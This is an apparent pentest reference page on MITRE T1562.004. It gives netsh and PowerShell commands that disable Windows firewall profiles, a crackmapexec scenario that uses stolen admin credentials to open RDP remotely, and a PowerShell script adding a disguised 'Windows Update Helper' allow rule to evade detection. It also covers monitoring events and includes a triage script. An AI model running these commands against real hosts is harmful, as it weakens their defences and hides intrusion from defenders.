Disable or Modify System Firewall

https://attack.mitre.org/techniques/T1562/004/

ATT&CK ID: T1562.004

Permissions Required: Administrator | SYSTEM

Description

Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.

Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.

(Source: MITRE ATT&CK, T1562.004)

Techniques

CMD

# Disable all profiles
netsh advfirewall set allprofiles state off

# Disable public profile
netsh advfirewall set publicprofile state off

# Disable domain profile
netsh advfirewall set domainprofile state off

# Disable current profile
netsh advfirewall set currentprofile state off

# Enable all profiles
netsh advfirewall set allprofiles state on

PowerShell

# Disable all profiles
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

# Disable public profile
Set-NetFirewallProfile -Profile Public -Enabled False

# Disable domain profile
Set-NetFirewallProfile -Profile Domain -Enabled False

# Disable private profile
Set-NetFirewallProfile -Profile Private -Enabled False

# Enable all profiles
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True

Scenario

In the scenario below we have gained access to administrative credentials for the host 10.10.10.10. However, we are looking to gain RDP access.

Scanning port 3389 with Nmap reports the port as filtered: the probes get no response rather than a RST, which points to a host firewall rule dropping inbound connections to 10.10.10.10 rather than to a closed port.

As we have administrative credentials, we use crackmapexec for remote command execution (the -X flag runs the argument as a PowerShell command on the target). First we view the current state of the firewall profiles on the target host.

crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -d '<Domain>' -X 'Get-NetFirewallProfile -Name Public,Domain,Private | Select Name,Enabled'

Next, we execute the command below to turn off all available firewall profiles.

crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -d '<Domain>' -X 'Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False'

Then check the current status of the profiles again.

crackmapexec smb '<IP>' -u '<User>' -p '<Password>' -d '<Domain>' -X 'Get-NetFirewallProfile -Name Public,Domain,Private | Select Name,Enabled'

Rescanning port 3389 with Nmap now shows it as open, and we can connect for RDP access using a client such as xfreerdp.
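Turning off all three profiles, as in the scenario above, is the noisiest way to get the port: it changes profile-level state that defenders poll with Get-NetFirewallProfile and leaves every inbound port open. The same ATT&CK technique also covers adding or modifying individual rules, and a single inbound allow rule scoped to TCP/3389 from one source address gives the same RDP access with the profiles still reporting Enabled=True. The PowerShell below is an added example written for this page, not part of the original scenario; it would be run on the target the same way (for example through crackmapexec -X). The rule display name and the attacker address 10.10.10.20 are assumptions.

```powershell
# Added example: scoped allow rule instead of disabling the firewall profiles.
# Assumed values: attacker host 10.10.10.20, arbitrary rule display name.
$RuleName = 'Windows Update Helper'   # assumed; blends in with existing rule names
$Source   = '10.10.10.20'             # assumed attacker address

# 1. Record the profile state so we can show it has not changed afterwards.
Get-NetFirewallProfile | Select-Object Name, Enabled, DefaultInboundAction | Format-Table -AutoSize

# 2. If the built-in "Remote Desktop" rule group already exists, enabling it is
#    enough and no new rule is needed. Show what is there before adding anything.
$RdpGroup = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
            Where-Object { $_.Direction -eq 'Inbound' }
if ($RdpGroup) {
    $RdpGroup | Select-Object DisplayName, Enabled, Profile | Format-Table -AutoSize
}

# 3. Add one inbound allow rule limited to TCP/3389 from the single source address.
#    Every profile stays enabled; only this rule is new.
New-NetFirewallRule -DisplayName $RuleName `
                    -Direction Inbound `
                    -Protocol TCP `
                    -LocalPort 3389 `
                    -RemoteAddress $Source `
                    -Action Allow `
                    -Profile Any | Out-Null

# 4. Confirm the rule and the filters attached to it.
$Rule = Get-NetFirewallRule -DisplayName $RuleName
$Rule | Select-Object DisplayName, Enabled, Direction, Action, Profile | Format-Table -AutoSize
$Rule | Get-NetFirewallPortFilter    | Select-Object Protocol, LocalPort
$Rule | Get-NetFirewallAddressFilter | Select-Object RemoteAddress

# 5. Profiles are untouched, so a defender polling only profile state sees nothing.
Get-NetFirewallProfile | Select-Object Name, Enabled | Format-Table -AutoSize

# 6. Cleanup once RDP access is no longer needed.
# Remove-NetFirewallRule -DisplayName $RuleName
```

The narrower rule still leaves a trail: the Security log records a rule addition (event 4946 when MPSSVC Rule-Level Policy Change auditing is on) and the firewall operational log records event 2004, and Get-NetFirewallRule lists the new rule. What it avoids is the profile-level setting change (event 4950) and the wide-open host that the scenario's approach produces.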

Mitigation

  • Monitor for changes in the status of the system firewall, such as Windows Security Auditing events 5025 (The Windows Firewall Service has been stopped) and 5034 (The Windows Firewall Driver has been stopped), and for profile or rule changes such as 4950 (A Windows Firewall setting has changed) and 4946/4947/4948 (a rule was added/modified/deleted).

  • Monitor for changes made to Windows Registry keys and/or values that adversaries might use to disable or modify system firewall settings, such as the EnableFirewall values under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy.

  • Monitor executed commands and arguments associated with disabling or modifying the system firewall, such as netsh advfirewall set allprofiles state off or Set-NetFirewallProfile ... -Enabled False.
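The three monitoring points above can be checked locally from an elevated PowerShell session when triaging a suspect host. The script below is an added example for this page, not part of the original: it pulls the Security log events named above together with the firewall operational log events 2003 (profile setting changed) and 2004/2005/2006 (rule added/modified/deleted), reads the EnableFirewall registry values under FirewallPolicy, and compares them with what Get-NetFirewallProfile reports. The 24-hour lookback window is an assumption.

```powershell
# Added example: local triage of T1562.004 indicators. Run from an elevated session.
$Since = (Get-Date).AddHours(-24)   # assumed lookback window

function Show-Events {
    param([string]$LogName, [int[]]$Ids, [datetime]$StartTime)
    # First line of the message is the human-readable summary; the rest is detail.
    Get-WinEvent -FilterHashtable @{ LogName = $LogName; Id = $Ids; StartTime = $StartTime } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
            @{ Name = 'Summary'; Expression = { ($_.Message -split "`r?`n")[0] } } |
        Format-Table -AutoSize
}

# 1. Security log: 5025 / 5034 service or driver stopped, 4950 a profile setting
#    changed, 4946 / 4947 / 4948 a rule added / modified / deleted. These are only
#    written when the matching audit subcategories (Other System Events,
#    MPSSVC Rule-Level Policy Change) are enabled.
Show-Events -LogName 'Security' -Ids 4946, 4947, 4948, 4950, 5025, 5034 -StartTime $Since

# 2. Firewall operational log: 2003 setting changed in a profile, 2004 / 2005 / 2006
#    rule added / modified / deleted. These need no extra audit policy and record the
#    modifying user and process, which is what you want for attribution.
Show-Events -LogName 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' `
            -Ids 2003, 2004, 2005, 2006 -StartTime $Since

# 3. Registry vs. live state. Each profile key under FirewallPolicy holds an
#    EnableFirewall DWORD (0 = off). The Private profile is stored under
#    "StandardProfile". A mismatch against Get-NetFirewallProfile points at a
#    registry edit the service has not applied yet, or a GPO overriding local state.
$Base   = 'HKLM:\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy'
$KeyFor = @{ Domain = 'DomainProfile'; Private = 'StandardProfile'; Public = 'PublicProfile' }
$Live   = @{}
Get-NetFirewallProfile | ForEach-Object { $Live[$_.Name] = $_.Enabled }

foreach ($Profile in 'Domain', 'Private', 'Public') {
    $Key = "$Base\$($KeyFor[$Profile])"
    $Reg = (Get-ItemProperty -Path $Key -Name EnableFirewall -ErrorAction SilentlyContinue).EnableFirewall
    $RegText = if ($null -eq $Reg) { 'not set' } else { $Reg }
    [pscustomobject]@{
        Profile       = $Profile
        RegistryValue = $RegText
        LiveEnabled   = $Live[$Profile]
    }
}
```

Run the event searches and the state comparison together: a host whose profiles all read Enabled=False with no 4950 or 2003 event in the window usually means the audit subcategories were never enabled, or the change predates the window, and either way the registry and live state are the ground truth to act on.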

Further Reading

Enable / disable firewall from command line: https://www.windows-commandline.com/enable-disable-firewall-command-line/
